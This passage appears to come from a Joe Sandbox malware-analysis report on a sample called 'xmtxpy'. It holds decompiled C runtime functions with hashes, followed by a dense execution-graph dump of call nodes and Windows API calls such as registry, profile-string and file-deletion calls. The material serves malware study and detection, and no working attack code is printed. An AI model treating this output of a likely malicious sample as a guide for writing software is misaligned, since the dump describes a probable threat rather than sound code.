                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction ID: f0aa836b5b536b0d6639989ecb9ac4590cd3c53bf8cec690e951bc032c7541af
                          • Opcode Fuzzy Hash: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction Fuzzy Hash: 22110632500A15EFCF203F78AC08BDA37D8FF14364F104625FA48DEBA1EA3588818699
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008B5DFD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				intOrPtr _t25;
                          				void* _t26;
                          
                          				_t25 = _a16;
                          				if(_t25 == 0x65 || _t25 == 0x45) {
                          					_t26 = E008B634E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          					goto L9;
                          				} else {
                          					_t35 = _t25 - 0x66;
                          					if(_t25 != 0x66) {
                          						__eflags = _t25 - 0x61;
                          						if(_t25 == 0x61) {
                          							L7:
                          							_t26 = E008B5E83(_a4, _a8, _a12, _a20, _a24, _a28);
                          						} else {
                          							__eflags = _t25 - 0x41;
                          							if(__eflags == 0) {
                          								goto L7;
                          							} else {
                          								_t26 = E008B65C9(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                          							}
                          						}
                          						L9:
                          						return _t26;
                          					} else {
                          						return E008B6508(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                          					}
                          				}
                          			}






                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction ID: 52323a7aeb8314376a3117bedf4e11b5d1e225a609a33d4a0d7b72315e6ec6a5
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 8201087240054EBBCF225E98CC41DEE3F66FB1C354B598415FA1899235D336DAB1AB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008A2AC1(void* __eax, void* __esi) {
                          				intOrPtr _t8;
                          				void* _t17;
                          				void* _t20;
                          				void* _t21;
                          				void* _t22;
                          				void* _t23;
                          
                          				_t17 = __esi + 1;
                          				_t20 = __eax + 1 -  *0x8bed30; // 0x8bfc08
                          				if(_t20 != 0) {
                          					E008B0308(_t5);
                          				}
                          				_t21 =  *((intOrPtr*)(_t17 + 0x44)) -  *0x8bed34; // 0x8bfc08
                          				if(_t21 != 0) {
                          					E008B0308(_t6);
                          				}
                          				_t22 =  *((intOrPtr*)(_t17 + 0x48)) -  *0x8bed38; // 0x8bfc08
                          				if(_t22 != 0) {
                          					E008B0308(_t7);
                          				}
                          				_t8 =  *((intOrPtr*)(_t17 + 0x4c));
                          				_t23 = _t8 -  *0x8bed3c; // 0x8bfc08
                          				if(_t23 != 0) {
                          					_t8 = E008B0308(_t8);
                          				}
                          				return _t8;
                          			}










                          APIs
                          • _free.LIBCMT ref: 008B260B
                            • Part of subcall function 008B0308: HeapFree.KERNEL32(00000000,00000000), ref: 008B031C
                            • Part of subcall function 008B0308: GetLastError.KERNEL32(00000000,?,008AED38,00000000,008B10BC,008B7791,00000000,?,008B688D,00000000,00010000,00030000,?,008B4AE7), ref: 008B032E
                          • _free.LIBCMT ref: 008B261D
                          • _free.LIBCMT ref: 008B262F
                          • _free.LIBCMT ref: 008B2641
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction ID: 43e15a15d5b96cb2ff248fd7215bf6be304855f98b2f329056588cc4e60cfb3e
                          • Opcode Fuzzy Hash: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction Fuzzy Hash: 33E092321952149FD614EBACF9CA8DB33ECF6193107740C05F085C7320D625F8804B25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
                          			E008A592D(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
                          				signed int _v4;
                          				signed int _t7;
                          				void* _t8;
                          				void* _t10;
                          				void* _t11;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          				void* _t24;
                          				void* _t25;
                          				void* _t26;
                          				void* _t29;
                          				signed int _t31;
                          				void* _t35;
                          				void* _t36;
                          
                          				_t25 = __edi;
                          				_t24 = __edx;
                          				 *__eax =  *__eax + __eax;
                          				_t36 = _t35 + 0xc;
                          				if(__eax != 0) {
                          					L9:
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					_push(_t19);
                          					E008B1058(_t19, _t24);
                          					asm("int3");
                          					_push(_t31);
                          					_t7 = _v4;
                          					 *0x8bf418 = _t7;
                          					return _t7;
                          				} else {
                          					_t8 = E008B193E(0x8bf452);
                          					_pop(_t21);
                          					if(_t8 + 1 <= 0x3c) {
                          						L4:
                          						_t10 = E008B19EB(0x8bf420, 0x314, L"\n\n");
                          						_t36 = _t36 + 0xc;
                          						if(_t10 != 0) {
                          							goto L9;
                          						} else {
                          							_t11 = E008B19EB(0x8bf420, 0x314, _t25);
                          							_t36 = _t36 + 0xc;
                          							_t43 = _t11;
                          							if(_t11 != 0) {
                          								goto L9;
                          							} else {
                          								E008B1B15(_t21, _t24, _t43, 0x8bf420, L"Microsoft Visual C++ Runtime Library", 0x12010);
                          								_pop(_t20);
                          								_pop(_t26);
                          								_pop(_t29);
                          								return E008B1CFB(_t20, _v4 ^ _t31, _t24, _t26, _t29);
                          							}
                          						}
                          					} else {
                          						_t21 = 0x8bf3dc + E008B193E(0x8bf452) * 2;
                          						_t18 = E008B1A57(0x8bf3dc + E008B193E(0x8bf452) * 2, __esi - (0x8bf3dc + E008B193E(0x8bf452) * 2 - 0x8bf452 >> 1), L"...", 3);
                          						_t36 = _t36 + 0x14;
                          						if(_t18 != 0) {
                          							goto L9;
                          						} else {
                          							goto L4;
                          						}
                          					}
                          				}
                          			}



















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: Message___crt__invoke_watson
                          • String ID: ...$Microsoft Visual C++ Runtime Library
                          • API String ID: 1560407238-1400160072
                          • Opcode ID: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction ID: 2a786292ba2e1302313ff6bfd6ff2c13696f24582b93c1c4ab7a77e6bb9970a0
                          • Opcode Fuzzy Hash: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction Fuzzy Hash: 0201D411B5020122EA2126B92D2BBEF5F58FB1B714B880135FF15E9B83F9459B188096
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:19%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1246
                          Total number of Limit Nodes:99
14454 402bab 2 API calls 14453->14454 14454->14456 14456->14433 14456->14451 14458 402bab 2 API calls 14456->14458 14598 4098a7 14456->14598 14458->14456 14460 4031e5 4 API calls 14459->14460 14461 4044b9 GetPrivateProfileStringW 14460->14461 14461->14417 14463 4031e5 4 API calls 14462->14463 14464 405f1d 14463->14464 14465 405f55 14464->14465 14466 402b7c 2 API calls 14464->14466 14465->14430 14465->14433 14465->14438 14465->14439 14467 405f36 14466->14467 14467->14465 14468 4031e5 4 API calls 14467->14468 14468->14465 14607 40642c 14469->14607 14471 40a469 14472 40c4ff 14471->14472 14610 4047e6 14471->14610 14472->14434 14475 4040bb 13 API calls 14476 40bf88 14475->14476 14476->14472 14477 403c90 9 API calls 14476->14477 14478 40bfaa 14477->14478 14479 402b7c 2 API calls 14478->14479 14483 40bfc1 14479->14483 14480 40c4f3 14481 403f9e 5 API calls 14480->14481 14481->14472 14482 40c3aa 14482->14480 14484 4056bf 2 API calls 14482->14484 14491 40c4e3 14482->14491 14483->14482 14617 40a423 14483->14617 14487 40c3d2 14484->14487 14485 402bab 2 API calls 14485->14480 14490 4040bb 13 API calls 14487->14490 14487->14491 14489 405f08 4 API calls 14493 40c005 14489->14493 14494 40c3f3 14490->14494 14491->14485 14492 40c021 14496 4031e5 4 API calls 14492->14496 14493->14492 14620 40a43f 14493->14620 14497 40c4d1 14494->14497 14677 405a52 14494->14677 14500 40c034 14496->14500 14499 413aca 4 API calls 14497->14499 14503 40c4dd 14499->14503 14507 4031e5 4 API calls 14500->14507 14502 402bab 2 API calls 14502->14492 14505 405695 2 API calls 14503->14505 14504 40c411 14682 405a87 14504->14682 14505->14491 14513 40c04d 14507->14513 14508 40c4b3 14509 402bab 2 API calls 14508->14509 14511 40c4cb 14509->14511 14510 405a52 4 API calls 14521 40c423 14510->14521 14512 403f9e 5 API calls 14511->14512 14512->14497 14515 4031e5 4 API calls 14513->14515 14514 405a87 4 API calls 14514->14521 14516 40c085 14515->14516 14518 4031e5 4 API calls 14516->14518 14517 405872 GetProcessHeap 
RtlAllocateHeap GetProcessHeap HeapFree 14517->14521 14519 40c09c 14518->14519 14522 4031e5 4 API calls 14519->14522 14520 402bab 2 API calls 14520->14521 14521->14508 14521->14510 14521->14514 14521->14517 14521->14520 14523 40c0b3 14522->14523 14524 4031e5 4 API calls 14523->14524 14525 40c0ca 14524->14525 14526 4031e5 4 API calls 14525->14526 14527 40c0e7 14526->14527 14528 4031e5 4 API calls 14527->14528 14529 40c100 14528->14529 14530 4031e5 4 API calls 14529->14530 14531 40c119 14530->14531 14532 4031e5 4 API calls 14531->14532 14533 40c132 14532->14533 14534 4031e5 4 API calls 14533->14534 14535 40c14b 14534->14535 14536 4031e5 4 API calls 14535->14536 14537 40c164 14536->14537 14538 4031e5 4 API calls 14537->14538 14539 40c17d 14538->14539 14540 4031e5 4 API calls 14539->14540 14541 40c196 14540->14541 14542 4031e5 4 API calls 14541->14542 14543 40c1af 14542->14543 14544 4031e5 4 API calls 14543->14544 14545 40c1c8 14544->14545 14546 4031e5 4 API calls 14545->14546 14547 40c1de 14546->14547 14548 4031e5 4 API calls 14547->14548 14549 40c1f4 14548->14549 14550 4031e5 4 API calls 14549->14550 14551 40c20d 14550->14551 14552 4031e5 4 API calls 14551->14552 14553 40c226 14552->14553 14554 4031e5 4 API calls 14553->14554 14555 40c23f 14554->14555 14556 4031e5 4 API calls 14555->14556 14557 40c258 14556->14557 14558 4031e5 4 API calls 14557->14558 14559 40c273 14558->14559 14560 4031e5 4 API calls 14559->14560 14561 40c28a 14560->14561 14562 4031e5 4 API calls 14561->14562 14564 40c2d5 14562->14564 14563 40c3a2 14565 402bab 2 API calls 14563->14565 14564->14563 14566 4031e5 4 API calls 14564->14566 14565->14482 14567 40c315 14566->14567 14568 40c38b 14567->14568 14623 404866 14567->14623 14569 403c40 5 API calls 14568->14569 14571 40c397 14569->14571 14573 403c40 5 API calls 14571->14573 14573->14563 14574 40c382 14575 403c40 5 API calls 14574->14575 14575->14568 14578 406c4c 6 API calls 14579 40c355 14578->14579 14579->14574 14647 4126a7 14579->14647 14584 
40956d 14581->14584 14587 409673 14581->14587 14582 408b45 6 API calls 14582->14584 14583 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 14583->14584 14584->14582 14584->14583 14585 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14584->14585 14586 402bab GetProcessHeap HeapFree 14584->14586 14584->14587 14585->14584 14586->14584 14587->14448 14589 4040bb 13 API calls 14588->14589 14597 4096a9 14589->14597 14590 40989f 14590->14453 14591 409896 14592 403f9e 5 API calls 14591->14592 14592->14590 14594 408b45 6 API calls 14594->14597 14595 402bab GetProcessHeap HeapFree 14595->14597 14596 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14596->14597 14597->14590 14597->14591 14597->14594 14597->14595 14597->14596 14846 4059d8 14597->14846 14599 4040bb 13 API calls 14598->14599 14605 4098c1 14599->14605 14600 4099fb 14600->14456 14601 4099f3 14602 403f9e 5 API calls 14601->14602 14602->14600 14603 4059d8 4 API calls 14603->14605 14604 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14604->14605 14605->14600 14605->14601 14605->14603 14605->14604 14606 402bab GetProcessHeap HeapFree 14605->14606 14606->14605 14608 4031e5 4 API calls 14607->14608 14609 406441 GetNativeSystemInfo 14608->14609 14609->14471 14611 4031e5 4 API calls 14610->14611 14613 40480a 14611->14613 14612 4031e5 4 API calls 14612->14613 14613->14612 14615 40484f 14613->14615 14616 40485d 14613->14616 14614 403c40 5 API calls 14614->14616 14615->14614 14616->14472 14616->14475 14618 4031e5 4 API calls 14617->14618 14619 40a435 14618->14619 14619->14489 14621 4031e5 4 API calls 14620->14621 14622 40a451 14621->14622 14622->14502 14624 4031e5 4 API calls 14623->14624 14625 40487c 14624->14625 14625->14574 14626 406c4c 14625->14626 14687 4068eb 14626->14687 14628 406cab 14699 40469b 14628->14699 14629 406c6c 14629->14628 14638 406e02 14629->14638 14696 406894 14629->14696 14636 406cef 14639 4031e5 4 API calls 14636->14639 14645 406df1 14636->14645 14637 
40469b 4 API calls 14637->14638 14638->14578 14640 406d26 14639->14640 14641 40771e 6 API calls 14640->14641 14640->14645 14646 406d57 14641->14646 14642 406da2 14643 4031e5 4 API calls 14642->14643 14643->14645 14645->14637 14646->14642 14712 4068b0 14646->14712 14648 4126bb 14647->14648 14649 4126d1 14647->14649 14650 412840 14648->14650 14768 40488c 14648->14768 14649->14650 14774 407055 14649->14774 14650->14574 14654 412837 14655 403c40 5 API calls 14654->14655 14655->14650 14658 41281e 14659 4070ff 6 API calls 14658->14659 14659->14654 14660 407055 6 API calls 14661 412742 14660->14661 14661->14658 14662 40719a 6 API calls 14661->14662 14663 41276e 14662->14663 14664 412804 14663->14664 14790 406f4a 14663->14790 14818 4070ff 14664->14818 14667 41279a 14796 412553 14667->14796 14840 405907 14677->14840 14679 405a61 14680 405a76 14679->14680 14681 405907 4 API calls 14679->14681 14680->14504 14681->14679 14683 402b7c 2 API calls 14682->14683 14685 405a99 14683->14685 14686 405ade 14685->14686 14843 40595e 14685->14843 14686->14521 14715 4076a8 14687->14715 14689 406913 14690 406a61 14689->14690 14691 40771e 6 API calls 14689->14691 14690->14629 14694 406949 14691->14694 14693 404678 4 API calls 14693->14694 14694->14690 14694->14693 14695 40771e 6 API calls 14694->14695 14721 4046c2 14694->14721 14695->14694 14697 4031e5 4 API calls 14696->14697 14698 4068a6 14697->14698 14698->14629 14700 4046b4 14699->14700 14701 4046a4 14699->14701 14700->14638 14703 404678 14700->14703 14702 4031e5 4 API calls 14701->14702 14702->14700 14704 4031e5 4 API calls 14703->14704 14705 40468b 14704->14705 14705->14638 14706 40771e 14705->14706 14707 407737 14706->14707 14711 407748 14706->14711 14708 407644 6 API calls 14707->14708 14709 407741 14708->14709 14710 406baa 6 API calls 14709->14710 14710->14711 14711->14636 14713 4031e5 4 API calls 14712->14713 14714 4068c2 14713->14714 14714->14646 14716 4076c1 14715->14716 14719 4076d2 14715->14719 14729 407644 14716->14729 
14719->14689 14722 4046d3 14721->14722 14723 4046d9 14721->14723 14764 40464c 14722->14764 14724 4046e9 14723->14724 14726 404678 4 API calls 14723->14726 14727 404714 14724->14727 14728 40469b 4 API calls 14724->14728 14726->14724 14727->14694 14728->14727 14730 407653 14729->14730 14731 407661 14729->14731 14730->14731 14737 406a6b 14730->14737 14733 406baa 14731->14733 14734 406bbb 14733->14734 14735 406bc8 14733->14735 14734->14735 14745 407402 14734->14745 14735->14719 14739 406a81 14737->14739 14738 402b7c 2 API calls 14738->14739 14739->14738 14740 406894 4 API calls 14739->14740 14741 406b96 14739->14741 14743 402bab 2 API calls 14739->14743 14744 406b8b 14739->14744 14740->14739 14742 402bab 2 API calls 14741->14742 14742->14744 14743->14739 14744->14731 14746 407644 6 API calls 14745->14746 14748 407412 14746->14748 14747 407450 14747->14735 14748->14747 14749 402b7c 2 API calls 14748->14749 14750 407483 14749->14750 14750->14747 14751 402b7c 2 API calls 14750->14751 14753 4074ce 14751->14753 14752 4074da 14754 4068cc 2 API calls 14752->14754 14753->14752 14755 402b7c 2 API calls 14753->14755 14754->14747 14758 40751f 14755->14758 14756 40752b 14757 4068cc 2 API calls 14756->14757 14757->14752 14758->14756 14760 4068cc 14758->14760 14761 4068d6 14760->14761 14762 4068e3 14760->14762 14761->14762 14763 402bab GetProcessHeap HeapFree 14761->14763 14762->14756 14763->14762 14765 404666 14764->14765 14766 404659 14764->14766 14765->14723 14767 4031e5 4 API calls 14766->14767 14767->14765 14769 4047e6 5 API calls 14768->14769 14770 404897 14769->14770 14771 40489c 14770->14771 14826 4047c7 14770->14826 14771->14649 14775 40706f 14774->14775 14780 407084 14774->14780 14776 407644 6 API calls 14775->14776 14775->14780 14777 40707d 14776->14777 14778 406baa 6 API calls 14777->14778 14778->14780 14781 4070e4 14780->14781 14829 406fd2 14780->14829 14781->14654 14782 40719a 14781->14782 14783 4071b0 14782->14783 14786 4071c5 14782->14786 14784 407644 6 API calls 
14783->14784 14783->14786 14785 4071be 14784->14785 14787 406baa 6 API calls 14785->14787 14788 406fd2 4 API calls 14786->14788 14789 407226 14786->14789 14787->14786 14788->14789 14789->14658 14789->14660 14791 406f64 14790->14791 14795 406f75 14790->14795 14792 407644 6 API calls 14791->14792 14793 406f6e 14792->14793 14794 406baa 6 API calls 14793->14794 14794->14795 14795->14667 14837 4060ac 14796->14837 14819 407116 14818->14819 14821 40712b 14818->14821 14820 407644 6 API calls 14819->14820 14819->14821 14822 407124 14820->14822 14824 406fd2 4 API calls 14821->14824 14825 407187 14821->14825 14823 406baa 6 API calls 14822->14823 14823->14821 14824->14825 14825->14658 14827 4031e5 4 API calls 14826->14827 14828 4047d9 14827->14828 14828->14649 14830 406fde 14829->14830 14831 407027 14830->14831 14832 4031e5 4 API calls 14830->14832 14831->14781 14833 406ffa 14832->14833 14834 4031e5 4 API calls 14833->14834 14835 407011 14834->14835 14836 4031e5 4 API calls 14835->14836 14836->14831 14838 4031e5 4 API calls 14837->14838 14839 4060bb 14838->14839 14839->14839 14841 4031e5 4 API calls 14840->14841 14842 40591a 14841->14842 14842->14679 14844 4031e5 4 API calls 14843->14844 14845 405971 14844->14845 14845->14685 14847 4031e5 4 API calls 14846->14847 14848 4059ed 14847->14848 14849 405a38 14848->14849 14850 402b7c 2 API calls 14848->14850 14849->14597 14851 405a16 14850->14851 14851->14849 14852 4031e5 4 API calls 14851->14852 14852->14849 14931 408952 14952 40823f 14931->14952 14934 408960 14936 4056bf 2 API calls 14934->14936 14937 40896a 14936->14937 14980 408862 14937->14980 14939 4089c4 14940 413aca 4 API calls 14939->14940 14941 4089d4 14940->14941 14943 405695 2 API calls 14941->14943 14942 408975 14942->14939 14988 4087d6 14942->14988 14945 4089df 14943->14945 14950 40899d 14950->14939 14951 402bab 2 API calls 14950->14951 14951->14950 14953 40824d 14952->14953 14954 4031e5 4 API calls 14953->14954 14967 40831b 14953->14967 14955 40826d 14954->14955 14956 
4031e5 4 API calls 14955->14956 14957 408289 14956->14957 14958 4031e5 4 API calls 14957->14958 14959 4082a5 14958->14959 14960 4031e5 4 API calls 14959->14960 14961 4082c1 14960->14961 14962 4031e5 4 API calls 14961->14962 14963 4082e2 14962->14963 14964 4031e5 4 API calls 14963->14964 14965 4082ff 14964->14965 14966 4031e5 4 API calls 14965->14966 14966->14967 14967->14934 14968 4083bb 14967->14968 15016 408363 14968->15016 14971 4084ab 14971->14934 14972 4056bf 2 API calls 14973 4083f4 14972->14973 14974 408492 14973->14974 15019 40815d 14973->15019 15034 40805d 14973->15034 14975 413aca 4 API calls 14974->14975 14976 4084a0 14975->14976 14977 405695 2 API calls 14976->14977 14977->14971 15049 404b8f 14980->15049 14982 408946 14982->14942 14983 4031e5 4 API calls 14984 40887e 14983->14984 14984->14982 14984->14983 14985 40893e 14984->14985 14987 402b7c 2 API calls 14984->14987 15052 404a39 14985->15052 14987->14984 14989 402b7c 2 API calls 14988->14989 14990 4087e7 14989->14990 14991 4031e5 4 API calls 14990->14991 14994 40885a 14990->14994 14995 408802 14991->14995 14992 402bab 2 API calls 14992->14994 15000 408749 14994->15000 14996 40884d 14995->14996 14999 408853 14995->14999 15061 408522 14995->15061 15065 4084b4 14995->15065 15068 4084d4 14996->15068 14999->14992 15001 404b8f 5 API calls 15000->15001 15005 408765 15001->15005 15002 4031e5 4 API calls 15002->15005 15003 408522 4 API calls 15003->15005 15004 4087c7 15006 404a39 5 API calls 15004->15006 15005->15002 15005->15003 15005->15004 15007 4087cf 15005->15007 15006->15007 15008 4085d1 15007->15008 15009 4086c2 15008->15009 15014 4085e9 15008->15014 15009->14950 15011 402bab 2 API calls 15011->15014 15012 4031e5 4 API calls 15012->15014 15014->15009 15014->15011 15014->15012 15074 4089e6 15014->15074 15093 4086c9 15014->15093 15097 4036a3 15014->15097 15017 4031e5 4 API calls 15016->15017 15018 408386 15017->15018 15018->14971 15018->14972 15020 40816f 15019->15020 15021 4081b6 15020->15021 15022 
4081fd 15020->15022 15033 4081ef 15020->15033 15024 405872 4 API calls 15021->15024 15023 405872 4 API calls 15022->15023 15025 408213 15023->15025 15026 4081cf 15024->15026 15028 405872 4 API calls 15025->15028 15027 405872 4 API calls 15026->15027 15029 4081df 15027->15029 15030 408222 15028->15030 15031 405872 4 API calls 15029->15031 15032 405872 4 API calls 15030->15032 15031->15033 15032->15033 15033->14973 15035 40808c 15034->15035 15036 4080d2 15035->15036 15037 408119 15035->15037 15048 40810b 15035->15048 15038 405872 4 API calls 15036->15038 15039 405872 4 API calls 15037->15039 15040 4080eb 15038->15040 15041 40812f 15039->15041 15042 405872 4 API calls 15040->15042 15043 405872 4 API calls 15041->15043 15044 4080fb 15042->15044 15045 40813e 15043->15045 15047 405872 4 API calls 15044->15047 15046 405872 4 API calls 15045->15046 15046->15048 15047->15048 15048->14973 15055 404a19 15049->15055 15051 404ba0 15051->14984 15058 4049ff 15052->15058 15054 404a44 15054->14982 15056 4031e5 4 API calls 15055->15056 15057 404a2c RegOpenKeyW 15056->15057 15057->15051 15059 4031e5 4 API calls 15058->15059 15060 404a12 RegCloseKey 15059->15060 15060->15054 15062 408534 15061->15062 15064 4085af 15062->15064 15071 4084ee 15062->15071 15064->14995 15066 4031e5 4 API calls 15065->15066 15067 4084c7 15066->15067 15067->14995 15069 4031e5 4 API calls 15068->15069 15070 4084e7 15069->15070 15070->14999 15072 4031e5 4 API calls 15071->15072 15073 408501 15072->15073 15073->15064 15075 4031e5 4 API calls 15074->15075 15076 408a06 15075->15076 15077 408b21 15076->15077 15078 4031e5 4 API calls 15076->15078 15077->15014 15081 408a32 15078->15081 15079 408b17 15109 403649 15079->15109 15081->15079 15100 403666 15081->15100 15084 408b0e 15106 40362f 15084->15106 15085 4031e5 4 API calls 15087 408a88 15085->15087 15087->15084 15088 4031e5 4 API calls 15087->15088 15089 408ac4 15088->15089 15090 405b6f 6 API calls 15089->15090 15091 408aff 15090->15091 15091->15084 15103 408508 
15091->15103 15094 408744 15093->15094 15096 4086e2 15093->15096 15094->15014 15095 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 15095->15096 15096->15094 15096->15095 15098 4031e5 4 API calls 15097->15098 15099 4036b5 15098->15099 15099->15014 15101 4031e5 4 API calls 15100->15101 15102 403679 15101->15102 15102->15084 15102->15085 15104 4031e5 4 API calls 15103->15104 15105 40851b 15104->15105 15105->15084 15107 4031e5 4 API calls 15106->15107 15108 403642 15107->15108 15108->15079 15110 4031e5 4 API calls 15109->15110 15111 40365c 15110->15111 15111->15077 15176 40f561 15179 40f4b6 15176->15179 15180 413b28 7 API calls 15179->15180 15181 40f4bf 15180->15181 15182 405b6f 6 API calls 15181->15182 15183 413a58 14 API calls 15181->15183 15184 402bab GetProcessHeap HeapFree 15181->15184 15185 40f559 15181->15185 15182->15181 15183->15181 15184->15181 15186 403b64 15187 4031e5 4 API calls 15186->15187 15188 403b77 PathFileExistsW 15187->15188 15212 40f16e 15213 4056bf 2 API calls 15212->15213 15214 40f17b 15213->15214 15215 412093 13 API calls 15214->15215 15216 40f19e 15215->15216 15217 412093 13 API calls 15216->15217 15218 40f1b6 15217->15218 15219 412093 13 API calls 15218->15219 15220 40f1cc 15219->15220 15221 412093 13 API calls 15220->15221 15222 40f1e2 15221->15222 15223 413aca 4 API calls 15222->15223 15224 40f1ef 15223->15224 15225 405695 2 API calls 15224->15225 15226 40f1fa 15225->15226 15227 40ce71 15228 413b28 7 API calls 15227->15228 15229 40ce78 15228->15229 15230 405b6f 6 API calls 15229->15230 15234 40ce83 15230->15234 15231 40cec1 15232 403fbf 7 API calls 15231->15232 15233 40cecc 15232->15233 15236 403d74 11 API calls 15233->15236 15245 40cefb 15233->15245 15234->15231 15237 403d74 11 API calls 15234->15237 15243 40ceba 15234->15243 15235 402bab 2 API calls 15235->15231 15238 40cee7 15236->15238 15239 40cead 15237->15239 15240 402bab 2 API calls 15238->15240 15244 40cef4 15238->15244 15242 402bab 2 API calls 15239->15242 
15239->15243 15240->15244 15241 402bab 2 API calls 15241->15245 15242->15243 15243->15235 15244->15241 15246 406472 15247 4031e5 4 API calls 15246->15247 15248 406484 Sleep 15247->15248 15306 403c08 15307 4031e5 4 API calls 15306->15307 15308 403c1a DeleteFileW 15307->15308 15309 410a09 15310 41219c 15 API calls 15309->15310 15311 410a1b 15310->15311 15312 41219c 15 API calls 15311->15312 15313 410a23 15312->15313 15314 41219c 15 API calls 15313->15314 15315 410a2c 15314->15315 15316 41219c 15 API calls 15315->15316 15317 410a38 15316->15317 15318 404b22 7 API calls 15317->15318 15319 410a4c 15318->15319 15320 403fbf 7 API calls 15319->15320 15325 410a7a 15319->15325 15321 410a5c 15320->15321 15322 413a58 14 API calls 15321->15322 15327 410a71 15321->15327 15324 410a6b 15322->15324 15323 402bab 2 API calls 15323->15325 15326 402bab 2 API calls 15324->15326 15326->15327 15327->15323 15331 40c509 15332 412093 13 API calls 15331->15332 15333 40c51e 15332->15333 15337 40910d 15338 404b22 7 API calls 15337->15338 15339 409124 15338->15339 15340 405b6f 6 API calls 15339->15340 15344 40917a 15339->15344 15341 40913e 15340->15341 15343 404b22 7 API calls 15341->15343 15349 409173 15341->15349 15342 402bab 2 API calls 15342->15344 15345 409153 15343->15345 15346 40916a 15345->15346 15348 409408 18 API calls 15345->15348 15347 402bab 2 API calls 15346->15347 15347->15349 15350 409164 15348->15350 15349->15342 15351 402bab 2 API calls 15350->15351 15351->15346 15355 410410 15356 4056bf 2 API calls 15355->15356 15357 41041b 15356->15357 15358 412093 13 API calls 15357->15358 15359 41043c 15358->15359 15360 413aca 4 API calls 15359->15360 15361 410449 15360->15361 15362 405695 2 API calls 15361->15362 15363 410454 15362->15363 15390 40c71a 15391 41219c 15 